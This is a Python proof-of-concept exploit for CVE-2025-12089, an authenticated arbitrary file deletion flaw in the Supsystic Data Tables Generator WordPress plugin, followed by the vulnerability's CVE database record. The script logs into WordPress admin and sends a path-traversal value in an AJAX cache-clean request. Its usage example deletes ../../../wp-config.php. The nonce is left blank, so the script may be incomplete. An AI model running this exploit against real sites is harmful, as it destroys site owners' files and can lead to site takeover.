CVE-2025-12089

import requests import sys # CVE-2025-12089 PoC - Arbitrary File Deletion # Target: Data Tables Generator by Supsystic plugin for WordPress # Authentication: Requires Administrator-level access def delete_arbitrary_file(target_url, wp_username, wp_password, file_to_delete): """ Delete arbitrary file on the server via cleanCache() function vulnerability Args: target_url: WordPress target URL (e.g., https://example.com) wp_username: WordPress administrator username wp_password: WordPress administrator password file_to_delete: Absolute path of file to delete """ session = requests.Session() # Step 1: Login to WordPress admin login_url = f"{target_url}/wp-login.php" login_data = { 'log': wp_username, 'pwd': wp_password, 'wp-submit': 'Log In', 'redirect_to': f"{target_url}/wp-admin/", 'testcookie': '1' } login_response = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Trigger cleanCache with arbitrary file path # The vulnerability allows path traversal via cache_dir parameter exploit_url = f"{target_url}/wp-admin/admin-ajax.php" # Encode file path for path traversal # Example: ../../../wp-config.php or specific file path exploit_data = { 'action': 'supsystic_tbl_cache_clean', 'cache_dir': file_to_delete, # Arbitrary file path 'nonce': '' # Need to obtain valid nonce from page source } # Alternative exploitation via direct POST to cache clean endpoint cache_clean_url = f"{target_url}/wp-admin/admin.php?page=supsystic-tables&module=cache" print(f"[*] Attempting to delete: {file_to_delete}") # Send exploitation request exploit_response = session.post(exploit_url, data=exploit_data) if exploit_response.status_code == 200: print("[+] Exploitation request sent") print(f"[+] Response: {exploit_response.text}") return True if __name__ == "__main__": if len(sys.argv) < 5: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <file_to_delete>") print(f"Example: python {sys.argv[0]} https://example.com admin password ../../../wp-config.php") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] file_path = sys.argv[4] delete_arbitrary_file(target, username, password, file_path)

{"cve": {"id": "CVE-2025-12089", "sourceIdentifier": "[email protected]", "published": "2025-11-13T04:15:45.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Data Tables Generator by Supsystic plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the cleanCache() function in all versions up to, and including, 1.10.45. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394112%40data-tables-generator-by-supsystic&new=3394112%40data-tables-generator-by-supsystic&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/15e671e5-a9a6-4439-93cc-8d46fe0cde16?source=cve", "source": "[email protected]"}]}}